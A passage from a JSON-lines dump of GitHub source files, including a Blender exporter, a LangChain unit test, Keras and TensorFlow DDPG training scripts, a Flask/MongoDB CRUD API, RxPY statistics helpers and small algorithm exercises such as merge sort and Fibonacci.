True\r\n\t)\r\n\tapply_transform : BoolProperty (\r\n\t\tname = \"Apply object transform\",\r\n\t\tdescription = \"Apply the object transform matrix when exporting meshes.\",\r\n\t\tdefault = True\r\n\t)\r\n\r\n\tdef execute (self, context : bpy.types.Context):\r\n\t\tcontext.window.cursor_set ('WAIT')\r\n\t\texport_meshes (\r\n\t\t\tcontext,\r\n\t\t\tself.filepath,\r\n\t\t\tself.use_selection,\r\n\t\t\tself.apply_transform,\r\n\t\t\taxis_conversion (to_forward = self.axis_forward, to_up = self.axis_up)\r\n\t\t)\r\n\t\tcontext.window.cursor_set ('DEFAULT')\r\n\r\n\t\treturn { 'FINISHED' }\r\n\r\ndef export_menu_func (self, context : bpy.types.Context):\r\n\tself.layout.operator (Exporter.bl_idname)\r\n","repo_name":"ostef/skeletal-animation-example","sub_path":"blender/io_anim_example/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"24562647467","text":"import os\n\nimport pytest\n\nfrom langchain_community.llms.openai import OpenAI\nfrom langchain_community.utils.openai import is_openai_v1\n\nos.environ[\"OPENAI_API_KEY\"] = \"foo\"\n\n\ndef _openai_v1_installed() -> bool:\n    try:\n        return is_openai_v1()\n    except Exception as _:\n        return False\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_model_param() -> None:\n    llm = OpenAI(model=\"foo\")\n    assert llm.model_name == \"foo\"\n    llm = OpenAI(model_name=\"foo\")\n    assert llm.model_name == \"foo\"\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_model_kwargs() -> None:\n    llm = OpenAI(model_kwargs={\"foo\": \"bar\"})\n    assert llm.model_kwargs == {\"foo\": \"bar\"}\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_invalid_model_kwargs() -> None:\n    with pytest.raises(ValueError):\n        OpenAI(model_kwargs={\"model_name\": \"foo\"})\n\n\n@pytest.mark.requires(\"openai\")\ndef test_openai_incorrect_field() -> None:\n    with pytest.warns(match=\"not default parameter\"):\n        llm = OpenAI(foo=\"bar\")\n    assert llm.model_kwargs == {\"foo\": \"bar\"}\n\n\n@pytest.fixture\ndef mock_completion() -> dict:\n    return {\n        \"id\": \"cmpl-3evkmQda5Hu7fcZavknQda3SQ\",\n        \"object\": \"text_completion\",\n        \"created\": 1689989000,\n        \"model\": \"text-davinci-003\",\n        \"choices\": [\n            {\"text\": \"Bar Baz\", \"index\": 0, \"logprobs\": None, \"finish_reason\": \"length\"}\n        ],\n        \"usage\": {\"prompt_tokens\": 1, \"completion_tokens\": 2, \"total_tokens\": 3},\n    }\n","repo_name":"langchain-ai/langchain","sub_path":"libs/community/tests/unit_tests/llms/test_openai.py","file_name":"test_openai.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":68990,"dataset":"github-code","pt":"7"}
{"seq_id":"5858773348","text":"# -*- coding = utf-8 -*-\n# @Time : 22:00\n# @Author : lolita\n# @File : Simple_Neural_Network_Practice.py\n# @Software: PyCharm\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nimport matplotlib.pyplot as plt\nimport warnings\nimport logging\n# Ignore a certain error\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nlogging.getLogger(\"tensorflow\").setLevel(logging.ERROR)\ntf.autograph.set_verbosity(0)\n\n\ndef load_data():\n    X = np.load(\"data/X.npy\")\n    y = np.load(\"data/y.npy\")\n    X = X[0:1000]\n    y = y[0:1000]\n    return X, y\n\n\ndef load_weights():\n    w1 = np.load(\"data/w1.npy\")\n    b1 = np.load(\"data/b1.npy\")\n    w2 = np.load(\"data/w2.npy\")\n    b2 = np.load(\"data/b2.npy\")\n    return w1, b1, w2, b2\n\n\ndef sigmoid(x):\n    return 1. / (1. + np.exp(-x))\n\n\n# load dataset\nX, y = load_data()\n\n'''\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n# You do not need to modify anything in this cell\nm, n = X.shape\nfig, axes = plt.subplots(8, 8, figsize=(8, 8))\nfig.tight_layout(pad=0.1)\n\nfor i, ax in enumerate(axes.flat):\n    random_index = np.random.randint(m)\n    # Select rows corresponding to the random indices and\n    # reshape the image\n    X_random_reshaped = X[random_index].reshape((20, 20)).T\n    # Display the image\n    ax.imshow(X_random_reshaped, cmap='gray')\n    # Display the label above the image\n    ax.set_title(y[random_index])\n    ax.set_axis_off()\nplt.show()\n'''\n\nmodel = Sequential(\n    [\n        tf.keras.Input(shape=(400,)),  # specify input size\n        Dense(25, activation='sigmoid', name='layer1'),\n        Dense(15, activation='sigmoid', name='layer2'),\n        Dense(1, activation='sigmoid', name='layer3')\n    ], name=\"my_model\"\n)\n# model.summary()\n\n[layer1, layer2, layer3] = model.layers\n\nmodel.compile(\n    loss=tf.keras.losses.BinaryCrossentropy(),\n    optimizer=tf.keras.optimizers.Adam(0.001),\n)\n\nmodel.fit(\n    X, y,\n    epochs=20\n)\n\nprediction = model.predict(X[0].reshape(1, 400))  # a zero\n# prediction = model.predict(X[500].reshape(1, 400))  # a one\nif prediction >= 0.5:\n    yhat = 1\nelse:\n    yhat = 0\nprint(f\"prediction after threshold: {yhat}\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"lolitahouse/OpenCV-Practice-Project","sub_path":"Deep_Learning/Class2/Week1/Simple_Neural_Network_Practice.py","file_name":"Simple_Neural_Network_Practice.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"17382214326","text":"from flask import json, request, Response\nfrom flask_cors import CORS\nfrom flask_expects_json import expects_json\nfrom bson.json_util import dumps\nfrom bson.objectid import ObjectId\n\nfrom flask_restful import Resource\nfrom app_config import mongo\n\nfrom schema.room_schema import room_schema\n\nclass RoomsApi(Resource):\n    \n    def get(self):\n        try:\n            get_room=list(mongo.db.room.find())\n            \n            for information in get_room:\n                information[\"_id\"]= str(information[\"_id\"])\n            return Response( \n                response = json.dumps(get_room),\n                status=200,\n                mimetype=\"application/json\"\n            )\n         \n        except Exception as e:\n            print (e)\n            return Response( response= json.dumps({ \"msg\":\"could not retrieve user info\"}),\n            status=500,\n            mimetype=\"application/json\"\n            )\n\n    \n    @expects_json(room_schema)\n    def post(self):\n        post_room={ \n            \"room_no\":request.json[\"room_no\"],\n            \"room_type\":request.json[\"room_type\"],\n            \"room_status\":request.json[\"room_status\"],\n            \"room_rate\":request.json[\"room_rate\"]\n            }\n        _post= mongo.db.room.insert_one(post_room)\n\n        return Response(\n            response = json.dumps({ \"msg\":\"room info created\"}),\n            status=200,\n            mimetype=\"application/json\"\n\n        )\n    \n    \nclass RoomApi(Resource):\n\n    def get(self, id):\n        room = mongo.db.room.find_one({'_id': ObjectId(id)})\n        resp = Response(dumps(room), mimetype='application/json', status=200)\n        return resp\n    \n    @expects_json(room_schema)\n    def patch(self, id):\n        try:\n            _update = mongo.db.room.update_one(\n                {\"_id\":ObjectId(id)},\n                {\"$set\":{\"room_no\":request.json[\"room_no\"],\n                \"room_type\":request.json[\"room_type\"],\n                \"room_status\":request.json[\"room_status\"],\n                \"room_rate\":float(request.json[\"room_rate\"])}}\n            )\n            return Response( response= json.dumps({\"msg\":\"Room info updated successfully\" }),\n            status=200,\n            mimetype=\"application/json\"\n            )\n        \n        except Exception as e:\n            print(e)\n            return Response(response= json.dumps({ \"msg\":\"Could not update room info\" }),\n            status=500,\n            mimetype=\"application/json\"\n            )\n\n\n    def delete(self, id):\n        try:\n            _delete= mongo.db.room.delete_one({ \"_id\": ObjectId(id) })\n\n            return Response( \n                response = json.dumps({\"msg\": \"Room info has been deleted\"}),\n                status=200,\n                mimetype=\"application/json\"\n            )\n\n        except Exception as e:\n            print (e)\n\n            return Response( \n                response = json.dumps({\"msg\": \"Room info did not get deleted\"}),\n                status=500,\n                mimetype=\"application/json\"\n            )","repo_name":"dpka09/Crud-with-python","sub_path":"controller/room_controller.py","file_name":"room_controller.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"928503744","text":"import math\nfrom typing import Any\n\nfrom reactivex import Observable\n\n\ndef determine_median(sorted_list):\n    if len(sorted_list) == 0:\n        raise Exception(\"The input sequence was empty\")\n\n    if len(sorted_list) % 2 == 1:\n        return sorted_list[int((len(sorted_list) + 1) / 2) - 1]\n    else:\n        median_1 = sorted_list[int((len(sorted_list) + 1) / 2) - 1]\n        median_2 = sorted_list[int((len(sorted_list) + 1) / 2)]\n        return float(median_1 + median_2) / 2.0\n\n\ndef median(source: Observable) -> Observable:\n    \"\"\"\n    Calculates the statistical median on numerical emissions. The sequence must be finite.\n    \"\"\"\n    return source.to_sorted_list().map(lambda l: determine_median(l))\n\n\ndef mode(source: Observable[Any]) -> Observable[Any]:\n    \"\"\"\n    Returns the most frequently emitted value (or \"values\" if they have the same number of occurrences).\n    The sequence must be finite.\n    \"\"\"\n    return (\n        source.group_by(lambda v: v)\n        .flat_map(lambda grp: grp.count().map(lambda ct: (grp.key, ct)))\n        .to_sorted_list(lambda t: t[1], reverse=True)\n        .flat_map(lambda l: Observable.from_(l).take_while(lambda t: t[1] == l[0][1]))\n        .map(lambda t: t[0])\n    )\n\n\ndef variance(source: Observable) -> Observable:\n    \"\"\"\n    Returns the statistical variance of the numerical emissions.\n    The sequence must be finite.\n    \"\"\"\n    squared_values = (\n        source.to_list()\n        .flat_map(\n            lambda l: Observable.from_(l)\n            .average()\n            .flat_map(lambda avg: Observable.from_(l).map(lambda i: i - avg))\n        )\n        .map(lambda i: i * i)\n        .publish()\n        .auto_connect(2)\n    )\n\n    return Observable.zip(\n        squared_values.sum(), squared_values.count(), lambda sum, ct: sum / (ct - 1)\n    )\n\n\ndef standard_deviation(source: Observable) -> Observable:\n    \"\"\"\n    Returns the standard deviation of the numerical emissions.\n    The sequence must be finite.\n    \"\"\"\n    return source.variance().map(lambda i: math.sqrt(i))\n","repo_name":"ReactiveX/RxPY","sub_path":"examples/statistics/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":4581,"dataset":"github-code","pt":"7"}
{"seq_id":"41885978314","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/9/2 16:44\n# @Author : jhys\n# @FileName: 直方图正规化1.py\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n    src = cv2.imread(\"child.jpg\", cv2.IMREAD_ANYCOLOR)\n    dst = np.zeros_like(src)\n\n    cv2.normalize(src, dst, 0, 255, cv2.NORM_MINMAX, cv2.CV_8U)\n\n\n    # Compute the grayscale histograms\n    grayHist = cv2.calcHist([src], [0], None, [256], [0, 256])\n    grayHist1 = cv2.calcHist([dst], [0], None, [256], [0, 256])\n\n    # Plot the histograms\n    x_range = range(256)\n    plt.plot(x_range, grayHist, 'r', linewidth=1.5, c='black')\n    plt.plot(x_range, grayHist1, 'r', linewidth=1.5, c='b')\n    # Set the axis ranges\n    y_maxValue = np.max(grayHist)\n    plt.axis([0, 255, 0, y_maxValue])  # plotting range\n    plt.xlabel(\"gray Level\")\n    plt.ylabel(\"number of pixels\")\n    plt.show()\n\n    cv2.imshow(\"src\", src)\n    cv2.imshow(\"dst\", dst)\n    cv2.waitKey(0)\n    cv2.destroyWindow()\n\n","repo_name":"jhyscode/opencv-learning","sub_path":"ch22-直方图变换/直方图正规化1.py","file_name":"直方图正规化1.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"71370003103","text":"while True:\n\ttry:\t\t\n\t\tqtd = int(input())\n\t\tlista = []\n\t\tfor i in range(qtd):\n\t\t\tnum = (input())\n\t\t\tlista.append(num)\n\t\tlista.sort()\n\t\t#print (lista)\n\t\tcont = 0\n\n\t\tfor i in range(1, qtd):\n\t\t\tn1 = lista[i-1]\n\t\t\tn2 = lista[i]\n\t\t\t#print (n1, n2)\n\t\t\tif (n1[0] == n2[0]):\n\t\t\t\tif (len(n1) > len(n2)):\n\t\t\t\t\ttam = len(n1)\n\t\t\t\telse:\n\t\t\t\t\ttam = len(n2)\n\t\t\t\tj = 0\n\t\t\t\twhile (j < tam and n1[j] == n2[j]):\n\t\t\t\t\tcont = cont + 1\t\t\t\t\t\n\t\t\t\t\tj = j + 1\t\n\t\tprint (cont)\n\texcept:\n\t\tbreak\n","repo_name":"LucasBarbosaRocha/URI","sub_path":"Estruturas/1211.py","file_name":"1211.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"21250167923","text":"import seaborn as sns\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\n\nsns.set_style(\"darkgrid\")\n\ndf = pd.read_csv(\"ibex_35.csv\")\n\ndf = df.dropna()\n\nlog_returns = np.diff(np.log(df[\"Close\"].values))\n\nmu , std = norm.fit(log_returns)\n\nfig , ax = plt.subplots(figsize=(12,8))\nplt.rcParams.update({'font.size': 16})\nret = plt.hist(log_returns , bins = 100 , density = True , color=\"dodgerblue\" , label = \"Empirical Distribution\")\nxmin , xmax = plt.xlim()\n\nx = np.linspace(xmin , xmax , 100)\np = norm.pdf(x , mu , std)\nplt.plot(x , p ,'k' , linewidth=2 , label = \"Gaussian Fit\")\nplt.legend(loc=2)\n\nplt.title(\"IBEX-35 Log Returns Distribution\")\nplt.xlabel(\"$R_{(t)}$\")\n\n\naxins1 = zoomed_inset_axes(ax, zoom = 5, loc=1)\naxins1.hist(log_returns , bins=100 , density = True , color=\"dodgerblue\" , label=\"Fat Tails\")\naxins1.plot(x,p , 'k')\naxins1.legend(loc=1)\nx1, x2, y1, y2 = 0.035,0.060,0.05,2 \naxins1.set_xlim(x1, x2)\naxins1.set_ylim(y1, y2)\nplt.yticks(visible=False)\nmark_inset(ax, axins1, loc1=4, loc2=3, fc=\"none\", ec=\"0.5\")\nplt.savefig(\"gaussian_distributionibex.pdf\")\n","repo_name":"XabierGA/Ising_Econophysics","sub_path":"Data/distribution_returns.py","file_name":"distribution_returns.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"73155098462","text":"from starlite import Starlite, CORSConfig\n\nfrom controllers.index import TestController\nfrom controllers.locations import LocationController\n\nfrom dotenv import load_dotenv, find_dotenv\nimport os\n\nload_dotenv(find_dotenv())\n\nFRONTEND_URL: str\nif os.getenv(\"ENVIRONMENT\") == \"development\":\n    FRONTEND_URL = os.getenv(\"DEV_FRONTEND_URL\")\nelse:\n    FRONTEND_URL = os.getenv(\"PROD_FRONTEND_URL\")\n\napp = Starlite(\n    
route_handlers=[TestController, LocationController],\n cors_config=CORSConfig(\n allow_origins=[FRONTEND_URL],\n allow_methods=[\"GET\", \"POST\", \"PUT\", \"DELETE\"],\n allow_headers=[\"*\"],\n )\n)\n","repo_name":"foosh123/Your-Travel-Planner","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"42034194779","text":"import tensorflow as tf\nimport numpy as np\nimport numpy.random as nr\nimport gym\nimport time, copy\nfrom coflowgym.algo.ddpg import OUNoise, DDPG\n\n############################### DDPG with LSTM ####################################\n\nclass DDPG_LSTM(object):\n ##################### hyper parameters ####################\n LR_A = 0.001 # learning rate for actor, default is 0.001\n LR_C = 0.002 # learning rate for critic, default is 0.002\n GAMMA = 0.9 # reward discount, default to 0.9\n TAU = 0.01 # soft replacement, default to 0.01\n MEMORY_CAPACITY = 10000 # default to 10000\n BATCH_SIZE = 32\n\n ##################### success config ##############\n # LR_A = 0.001\n # LR_C = 0.0001\n # GAMMA = 0.9 \n # TAU = 0.001 \n # MEMORY_CAPACITY = 10000 \n # BATCH_SIZE = 32\n\n def __init__(self, a_dim, s_dim, a_bound, time_sequence=10, lstm_dim=128,GAMMA=0.9):\n # (s, s', a, r)\n self.memory = np.zeros((self.MEMORY_CAPACITY, s_dim * time_sequence * 2 + a_dim + 1), dtype=np.float32)\n self.pointer = 0\n self.sess = tf.Session()\n\n self.time_sequence = time_sequence\n self.lstm_dim = lstm_dim\n self.GAMMA = GAMMA\n self.update_every = 1\n\n self.a_dim, self.s_dim, self.a_bound = a_dim, s_dim, a_bound,\n self.S = tf.placeholder(tf.float32, [None, self.time_sequence, s_dim], 's')\n self.S_ = tf.placeholder(tf.float32, [None, self.time_sequence, s_dim], 's_')\n self.R = tf.placeholder(tf.float32, [None, 1], 'r')\n\n with tf.variable_scope('Actor'):\n self.a = self._build_a(self.S, scope='eval', trainable=True)\n a_ = self._build_a(self.S_, scope='target', trainable=False)\n with tf.variable_scope('Critic'):\n # assign self.a = a in memory when calculating q for td_error,\n # otherwise the self.a is from Actor when updating Actor\n q = self._build_c(self.S, self.a, scope='eval', trainable=True)\n q_ = self._build_c(self.S_, a_, scope='target', trainable=False)\n\n # networks parameters\n self.ae_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/eval')\n self.at_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Actor/target')\n self.ce_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/eval')\n self.ct_params = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='Critic/target')\n\n # target net replacement\n self.soft_replace = [tf.assign(t, (1 - self.TAU) * t + self.TAU * e)\n for t, e in zip(self.at_params + self.ct_params, self.ae_params + self.ce_params)]\n\n q_target = self.R + self.GAMMA * q_\n # in the feed_dic for the td_error, the self.a should change to actions in memory\n td_error = tf.losses.mean_squared_error(labels=q_target, predictions=q)\n self.ctrain = tf.train.AdamOptimizer(self.LR_C).minimize(td_error, var_list=self.ce_params)\n tf.summary.scalar(\"td_error\", td_error)\n\n a_loss = - tf.reduce_mean(q) # maximize the q\n self.atrain = tf.train.AdamOptimizer(self.LR_A).minimize(a_loss, var_list=self.ae_params)\n tf.summary.scalar(\"a_loss\", a_loss)\n\n self.merged = tf.summary.merge_all()\n self.writer = tf.summary.FileWriter(\"tf_log/\", self.sess.graph)\n 
self.sess.run(tf.global_variables_initializer())\n\n def choose_action(self, s):\n actions = self.sess.run(self.a, {self.S: s[np.newaxis, :]})\n # print(\"actions: \", actions)\n return actions[0]\n\n def learn(self):\n # soft target replacement\n self.sess.run(self.soft_replace)\n\n for _ in range(self.update_every):\n indices = np.random.choice(self.MEMORY_CAPACITY, size=self.BATCH_SIZE)\n bt = self.memory[indices, :]\n bs = bt[:, :self.s_dim*self.time_sequence]\n ba = bt[:, self.s_dim*self.time_sequence: self.s_dim*self.time_sequence + self.a_dim]\n br = bt[:, -self.s_dim*self.time_sequence - 1: -self.s_dim*self.time_sequence]\n bs_ = bt[:, -self.s_dim*self.time_sequence:]\n bs = bs.reshape(-1, self.time_sequence, self.s_dim)\n bs_ = bs_.reshape(-1, self.time_sequence, self.s_dim)\n\n self.sess.run(self.atrain, {self.S: bs})\n self.sess.run(self.ctrain, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})\n summary = self.sess.run(self.merged, {self.S: bs, self.a: ba, self.R: br, self.S_: bs_})\n self.writer.add_summary(summary, self.pointer)\n\n def store_transition(self, s, a, r, s_):\n # print(s.reshape(1, -1).shape, a.shape, r, s_.reshape(1,-1).shape)\n transition = np.hstack((s.reshape(-1), a, [r], s_.reshape(-1)))\n index = self.pointer % self.MEMORY_CAPACITY # replace the old memory with new memory\n self.memory[index, :] = transition\n self.pointer += 1\n\n def _build_a(self, s, scope, trainable):\n with tf.variable_scope(scope):\n ## add LSTM\n hidden_units1 = 100\n # lstm_cell1 = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_units1)\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.lstm_dim)\n multi_lstm = tf.contrib.rnn.MultiRNNCell(cells=[lstm_cell])\n # init_state = multi_lstm.zero_state(batch_size=self.BATCH_SIZE, dtype=tf.float32)\n outputs, _ = tf.nn.dynamic_rnn(cell=multi_lstm, inputs=s, dtype=tf.float32)\n lstm_h = outputs[:, -1, :]\n\n n_l1 = 600\n n_l2 = 600\n # net1 = tf.layers.dense(s, n_l1, activation=tf.nn.relu, name='l1', trainable=trainable)\n w1 = tf.get_variable(\"w1\", [self.lstm_dim, n_l1], trainable=trainable)\n b1 = tf.get_variable(\"b1\", [1, n_l1], trainable=trainable)\n net1 = tf.nn.relu(tf.matmul(lstm_h, w1) + b1)\n ## BN\n # net1 = tf.nn.relu(tf.layers.batch_normalization(tf.matmul(s, w1) + b1, training=True, name=\"BN_1\"))\n w2 = tf.get_variable('w2', [n_l1, n_l2], trainable=trainable)\n b2 = tf.get_variable('b2', [1, n_l2], trainable=trainable)\n net = tf.nn.relu(tf.matmul(net1, w2) + b2)\n ## BN\n # net = tf.nn.relu(tf.layers.batch_normalization(tf.matmul(net1, w2) + b2, training=True, name=\"BN_2\"))\n a = tf.layers.dense(net, self.a_dim, activation=tf.nn.tanh, name='a', trainable=trainable)\n\n # tf.summary.histogram(scope+\"/w1\", w1)\n # tf.summary.histogram(scope+\"/b1\", b1)\n # tf.summary.histogram(scope+\"/w2\", w2)\n # tf.summary.histogram(scope+\"/b2\", b2)\n return tf.multiply(a, self.a_bound, name='scaled_a')\n\n def _build_c(self, s, a, scope, trainable):\n with tf.variable_scope(scope):\n ## add LSTM\n hidden_units1 = 128\n # lstm_cell1 = tf.contrib.rnn.BasicLSTMCell(num_units=hidden_units1)\n lstm_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.lstm_dim)\n multi_lstm = tf.contrib.rnn.MultiRNNCell(cells=[lstm_cell])\n # init_state = multi_lstm.zero_state(batch_size=self.BATCH_SIZE, dtype=tf.float32)\n outputs, _ = tf.nn.dynamic_rnn(cell=multi_lstm, inputs=s, dtype=tf.float32)\n lstm_h = outputs[:, -1, :]\n\n n_l1 = 600\n n_l2 = 600\n w1_s = tf.get_variable('w1_s', [self.lstm_dim, n_l1], trainable=trainable)\n w1_a = 
tf.get_variable('w1_a', [self.a_dim, n_l1], trainable=trainable)\n b1 = tf.get_variable('b1', [1, n_l1], trainable=trainable)\n data = tf.matmul(lstm_h, w1_s) + tf.matmul(a, w1_a) + b1\n ## BN\n # data = tf.layers.batch_normalization(tf.matmul(s, w1_s) + tf.matmul(a, w1_a) + b1, training=True, name=\"BN_1\")\n net1 = tf.nn.relu(data)\n w2 = tf.get_variable('w2', [n_l1, n_l2], trainable=trainable)\n b2 = tf.get_variable('b2', [1, n_l2], trainable=trainable)\n net = tf.nn.relu(tf.matmul(net1, w2) + b2)\n ## BN\n # net = tf.nn.relu(tf.layers.batch_normalization(tf.matmul(net1, w2) + b2, training=True, name=\"BN_2\"))\n\n # tf.summary.histogram(scope+\"/w1_s\", w1_s)\n # tf.summary.histogram(scope+\"/w1_a\", w1_a)\n # tf.summary.histogram(scope+\"/b1\", b1)\n # tf.summary.histogram(scope+\"/w2\", w2)\n # tf.summary.histogram(scope+\"/b2\", b2)\n return tf.layers.dense(net, 1, trainable=trainable) # Q(s,a)\n \n def save(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.save(self.sess, filename)\n \n def load(self, filename=\"./model.ckpt\"):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(self.sess, filename)\n\n############################### training ####################################\n############################### A Demo ####################################\nMAX_EPISODES = 2000\nMAX_EP_STEPS = 200 # default is 200\nRENDER = False\nENV_NAME = 'Pendulum-v0'\nA_BOUND = 2\n\n# RENDER = True\nMAX_EP_STEPS = 300\nENV_NAME = \"MountainCarContinuous-v0\"\nA_BOUND = 1\n\nEXPLORE = 70\npre_trained = False\n\ndef train():\n env = gym.make(ENV_NAME)\n env = env.unwrapped\n env.seed(1)\n\n s_dim = env.observation_space.shape[0]\n a_dim = env.action_space.shape[0]\n a_bound = np.array([np.float64(A_BOUND)])\n print(a_bound, env.action_space.high, env.action_space.low)\n time_sequence = 20\n\n oun = OUNoise(a_dim, mu=0.4)\n\n ddpg = DDPG_LSTM(a_dim, s_dim, a_bound, time_sequence)\n\n if pre_trained:\n ddpg.load('./log/model.ckpt')\n\n var = 3 # control exploration\n t1 = time.time()\n ave_rs = []\n his_step = []\n\n epsilon = 1\n for episode in range(1, 1+MAX_EPISODES):\n s = env.reset()\n ep_reward = 0\n oun.reset()\n epsilon -= (epsilon/EXPLORE)\n ## record state in one episode\n last_s = [[0]*s_dim]*(time_sequence-1)\n last_s.append(s)\n\n for j in range(MAX_EP_STEPS):\n if RENDER:\n env.render()\n\n # # get state sequence [st-3, st-2, st-1, st]\n # ep_s.append(s)\n # if len(ep_s) >= time_sequence:\n # ts = ep_s[-time_sequence:]\n # else:\n # ts = [[0]*s_dim]*(time_sequence-len(ep_s))\n # ts.extend(ep_s)\n\n # Add exploration noise\n action_original = ddpg.choose_action(np.array(last_s))\n # a = 2*a-1 ## for sigmoid\n # a = np.clip(np.random.normal(action_original, var), -1*a_bound[0], a_bound[0]) # add randomness to action selection for exploration\n a = action_original+max(0.01, epsilon)*oun.noise()\n s_, r, done, _ = env.step(a)\n # print(\"step:\", j, s, r, a)\n\n last_s_ = last_s.copy()\n del last_s_[0]\n last_s_.append(s_)\n ddpg.store_transition(np.array(last_s), a, r, np.array(last_s_))\n # print(\"last_s:\", last_s)\n # print(\"last_s_:\", last_s_)\n last_s = last_s_\n\n if ddpg.pointer > ddpg.BATCH_SIZE:\n if ddpg.pointer % 1 == 0:\n var *= .9995 # decay the action randomness\n ddpg.learn()\n if ddpg.pointer == (ddpg.BATCH_SIZE+1):\n print(\"Begin learning...\")\n\n # s = s_\n ep_reward += r\n if j == MAX_EP_STEPS-1 or done:\n his_step.append(j)\n print(\"episode\", episode, \"consume\", j, \"steps, epsilon =\", 
epsilon,\"var = \", var, \"ep_reward:\", ep_reward)\n break\n if episode % 20 == 0:\n t_steps, t_rewards = test(env, ddpg)\n print(\"in test: average consume %s steps and ep_rewards is %s!\"%(t_steps, t_rewards))\n if ENV_NAME == \"MountainCarContinuous-v0\" and t_steps < 180:\n ddpg.save(\"./log/model.ckpt\")\n break\n if ENV_NAME == 'Pendulum-v0' and t_rewards > -150:\n ddpg.save(\"./log/model.ckpt\")\n break\n # sys.stdout.flush()\n print('Running time: ', time.time() - t1)\n\ndef test(env, agent):\n TEST_EPISODE = 10\n ep_steps = 0\n test_reward = 0\n time_sequence = agent.time_sequence\n for _ in range(TEST_EPISODE):\n s = env.reset()\n last_s = [[0]*agent.s_dim]*(agent.time_sequence-1)\n last_s.append(s)\n for t in range(MAX_EP_STEPS):\n # env.render()\n a = agent.choose_action(np.array(last_s))\n s, r, done, _ = env.step(a)\n last_s.append(s)\n del last_s[0]\n test_reward += r\n if t == MAX_EP_STEPS-1 or done:\n # print(\"in test: consume %s steps!\"%(t))\n ep_steps += t\n break\n return ep_steps//TEST_EPISODE, test_reward//TEST_EPISODE\n\nif __name__ == \"__main__\":\n \n train()\n pass","repo_name":"chentianba/coflowgym","sub_path":"coflowgym/algo/ddpg_lstm.py","file_name":"ddpg_lstm.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"15076808918","text":"import random\n\n\ndef Merge(left, right):\n merge_list = list()\n left_idx, right_idx = 0, 0\n\n # case 1 : left, right 둘 다 존재할 경우\n while len(left) > left_idx and len(right) > right_idx:\n if left[left_idx] < right[right_idx]:\n merge_list.append(left[left_idx])\n left_idx += 1\n else:\n merge_list.append(right[right_idx])\n right_idx += 1\n\n # case 2 : left혹은 right만 존재할 경우\n while len(left) > left_idx:\n merge_list.append(left[left_idx])\n left_idx += 1\n\n while len(right) > right_idx:\n merge_list.append(right[right_idx])\n right_idx += 1\n\n return merge_list\n\n\ndef Merge_Sort(data):\n if len(data) <= 1:\n return data\n med = len(data) // 2\n left = Merge_Sort(data[:med])\n right = Merge_Sort(data[med:])\n return Merge(left, right)\n\n\nMS = random.sample(range(0, 1000), 100)\nMS = Merge_Sort(MS)\nprint(MS)\n","repo_name":"Jungho-Cheon/algorithm-python","sub_path":"Solutions/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"28972079180","text":"# 1. 재귀함수 활용.\ndef fib(n):\n global cnt1 # 밑에서 써야해서 global로 선언\n \n cnt1 += 1\n if (n == 1 or n == 2): # n이 1이나 2일때는 실행횟수가 늘어나지 않는다.\n cnt1 -= 1 # cnt += 1 해준걸 cnt -= 1로 다시 원래대로 돌려 놓는다.\n return 1 # 문제에서 제시한대로 그냥 옮겨 적은 것 뿐\n else: \n return (fib(n - 1) + fib(n - 2)) # 문제에서 제시한대로 그냥 옮겨 적은 것 뿐\n\n# 2. dp(동적프로그래밍)활용\ndef fibonacci(n):\n global cnt2 # 밑에서 써야해서 global로 선언\n\n # 피보나치 dp 식대로 그대로 적음\n dp = [0] * (n+1)\n dp[1] = 1\n dp[2] = 1\n \n for i in range(3, n+1):\n dp[i] = dp[i-1] + dp[i-2]\n 